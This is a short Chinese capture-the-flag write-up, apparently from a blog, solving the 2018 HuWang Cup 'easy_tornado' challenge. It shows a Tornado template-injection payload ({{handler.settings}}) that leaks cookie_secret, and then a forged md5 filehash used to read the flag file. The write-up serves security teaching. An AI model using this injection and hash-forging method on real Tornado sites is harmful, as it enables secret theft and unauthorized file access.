姿势
进入页面给出三个链接:
分别为:
提示:filename先被md5后,结合cookie_secret,再次被md5加密
先加密filename:
得到:3bf9f6cf685a6dd8defadabfb41a03a1
如何得到cookie_secret呢?
由于题目提示tornado,一个模板引擎,故进行初步尝试:
可知存在模板注入,而Tornado框架的附属文件handler.settings中存在cookie_secret
故get传参:/error?msg={{handler.settings}}
得到’cookie_secret’: ‘6db61b09-0353-4293-a91c-0477f173b2d8’}
接着进行联合:
得到7f25375cfd72e8dee195c76d776429f2
在flag.txt页面URL看到filehash
猜测filehash=md5(cookie_secret+md5(filename))
故构造POC如下:
/file?filename=/fllllllllllllag&filehash=7f25375cfd72e8dee195c76d776429f2
得到flag:
总结
以上为[网络安全/CTF]护网杯 2018 easy_tornado 解题详析,考察Tornado模板注入相关知识。
我是秋说,我们下次见。
